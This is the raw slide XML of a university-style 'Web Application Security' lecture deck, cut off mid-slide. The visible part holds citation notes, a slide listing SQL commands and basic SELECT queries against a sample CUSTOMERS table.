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51"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="476" r:id="rId2"/>
    <p:sldId id="283" r:id="rId3"/>
    <p:sldId id="284" r:id="rId4"/>
    <p:sldId id="286" r:id="rId5"/>
    <p:sldId id="287" r:id="rId6"/>
    <p:sldId id="289" r:id="rId7"/>
    <p:sldId id="290" r:id="rId8"/>
    <p:sldId id="478" r:id="rId9"/>
    <p:sldId id="484" r:id="rId10"/>
    <p:sldId id="479" r:id="rId11"/>
    <p:sldId id="480" r:id="rId12"/>
    <p:sldId id="481" r:id="rId13"/>
    <p:sldId id="477" r:id="rId14"/>
    <p:sldId id="482" r:id="rId15"/>
    <p:sldId id="483" r:id="rId16"/>
    <p:sldId id="273" r:id="rId17"/>
    <p:sldId id="274" r:id="rId18"/>
    <p:sldId id="275" r:id="rId19"/>
    <p:sldId id="276" r:id="rId20"/>
    <p:sldId id="277" r:id="rId21"/>
    <p:sldId id="485" r:id="rId22"/>
    <p:sldId id="486" r:id="rId23"/>
    <p:sldId id="487" r:id="rId24"/>
    <p:sldId id="488" r:id="rId25"/>
    <p:sldId id="489" r:id="rId26"/>
    <p:sldId id="490" r:id="rId27"/>
    <p:sldId id="491" r:id="rId28"/>
    <p:sldId id="278" r:id="rId29"/>
    <p:sldId id="279" r:id="rId30"/>
    <p:sldId id="291" r:id="rId31"/>
    <p:sldId id="292" r:id="rId32"/>
    <p:sldId id="294" r:id="rId33"/>
    <p:sldId id="295" r:id="rId34"/>
    <p:sldId id="296" r:id="rId35"/>
    <p:sldId id="297" r:id="rId36"/>
    <p:sldId id="298" r:id="rId37"/>
    <p:sldId id="299" r:id="rId38"/>
    <p:sldId id="300" r:id="rId39"/>
    <p:sldId id="302" r:id="rId40"/>
    <p:sldId id="312" r:id="rId41"/>
    <p:sldId id="313" r:id="rId42"/>
    <p:sldId id="303" r:id="rId43"/>
    <p:sldId id="304" r:id="rId44"/>
    <p:sldId id="305" r:id="rId45"/>
    <p:sldId id="306" r:id="rId46"/>
    <p:sldId id="307" r:id="rId47"/>
    <p:sldId id="308" r:id="rId48"/>
    <p:sldId id="309" r:id="rId49"/>
    <p:sldId id="310"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5"/>
    <p:restoredTop sz="73337" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" snapToObjects="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="61" d="100"/>
          <a:sy n="61" d="100"/>
        </p:scale>
        <p:origin x="1541"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 Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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4A85FB-3C3A-4B07-A86D-50B0DD4FC85A}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>2</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="285873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Recording Industry Association of America</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{1F52C056-4745-D94F-AA20-EC07D0C831A1}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>3</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3881865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a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-CA"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="240644" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3884414" y="8684381"/>
            <a:ext cx="2972098" cy="458108"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="90567" tIns="45283" rIns="90567" bIns="45283" anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r" eaLnBrk="1" hangingPunct="1"/>
            <a:fld id="{CCB03836-2063-47DE-9FAD-1ED709D33C06}" type="slidenum">
              <a:rPr lang="en-US" sz="1200"/>
              <a:pPr algn="r" eaLnBrk="1" hangingPunct="1"/>
              <a:t>4</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="371693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Src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: http://projects.webappsec.org/w/page/13246995/Web-Hacking-Incident-Database</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{BF4A85FB-3C3A-4B07-A86D-50B0DD4FC85A}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>5</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="105190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00CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Source: Online </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>BookStore</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, http://gotocode.com</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16</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="368988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00CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Source: JSP Blog, http://sourceforge.net</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33</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4070796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6858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381000" y="850900"/>
            <a:ext cx="4152900" cy="524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4686300" y="850900"/>
            <a:ext cx="4152900" cy="254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4686300" y="3549650"/>
            <a:ext cx="4152900" cy="254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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>M. Zulkernine</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>QRST-</a:t>
            </a:r>
            <a:fld id="{57AF9941-BE8A-4F3D-B5E8-69479F627826}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:r>
              <a:rPr lang="en-US" b="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1861387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685800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="850900"/>
            <a:ext cx="4152900" cy="524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850900"/>
            <a:ext cx="4152900" cy="524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 Zulkernine</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QRST-</a:t>
            </a:r>
            <a:fld id="{210506D4-F045-4AF2-A722-C13D294192F5}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:r>
              <a:rPr lang="en-US" b="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25997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5/24/2022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5/24/2022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oleObject" Target="../embeddings/oleObject2.bin"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image18.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image15.png"/><Relationship Id="rId9"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5C83E75-264D-4F41-B0A2-17D08AF27741}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8376DE5F-8A8C-244A-899F-62D6CD31227F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Web Application Security</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="311940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D75-D510-497D-A765-CD62828C4FC5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SQL commands</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A126404-6128-4845-AEAB-59117253DB3E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>CREATE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> - Creates a new table, a view of a table, or other object in the database.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>ALTER-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Modifies an existing database object, such as a table.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>DROP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> - Deletes an entire table, a view of a table or other objects in the database.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>SELECT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> - Retrieves certain records from one or more tables.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>INSERT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> - Creates a record.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>UPDATE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> - Modifies records.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>DELETE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> - Deletes records.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="267864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2C2A-D2EC-4D4F-A1BF-94F92D8658D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SQL select</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{587E3455-CFB5-4719-B5AE-EEC3EDE49ED3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>SELECT column1, column2....</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>columnN</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>FROM   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>table_name</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>WHERE  [CONDITION|EXPRESSION];</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="171607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38FD9-2285-4CE3-803A-BAE8D651A3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4DC524-582A-4A34-965E-EC44A4F4E296}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>SQL&gt; SELECT * FROM CUSTOMERS;</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ID | NAME     | AGE | ADDRESS   | SALARY   |</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1 | Ramesh   |  32 | Ahmedabad |  2000.00 |</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>|  2 | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Khilan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   |  25 | Delhi     |  1500.00 |</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>|  3 | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>kaushik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  |  23 | Kota      |  2000.00 |</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>|  4 | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Chaitali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> |  25 | Mumbai    |  6500.00 |</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>|  5 | Hardik   |  27 | Bhopal    |  8500.00 |</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>|  6 | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Komal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    |  22 | MP        |  4500.00 |</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>|  7 | Muffy    |  24 | Indore    | 10000.00 |</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>+----+----------+-----+-----------+----------+</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="371508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601C-CD0B-4282-9F9F-D1A2168915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CBBF76-3C9F-4472-802D-896F4CFDB8CE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="232229" y="1752600"/>
            <a:ext cx="8723085" cy="4373563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>SQL&gt; SELECT * FROM CUSTOMERS WHERE SALARY = 10000;</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ID | NAME  | AGE | ADDRESS | SALARY   |</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7 | Muffy |  24 | Indore  | 10000.00 |</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>+----+-------+-----+---------+----------+</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="150609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75303-393E-4667-919E-39F3485E1C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36AE91-5B4D-4E54-8C6A-1672913B5C25}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>SQL&gt; SELECT * FROM CUSTOMERS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>WHERE SALARY &gt; 2000 AND age &lt; 25;</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ID | NAME     | AGE | ADDRESS   | SALARY   |</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6 | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Komal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    |  22 | MP        |  4500.00 |</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>|  7 | Muffy    |  24 | Indore    | 10000.00 |</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>+----+----------+-----+-----------+----------+</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3385267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8AAA-DC81-4927-A608-CCBA87DA1AF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5FC1C6-2CFD-4A8C-A1F1-5632417728EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
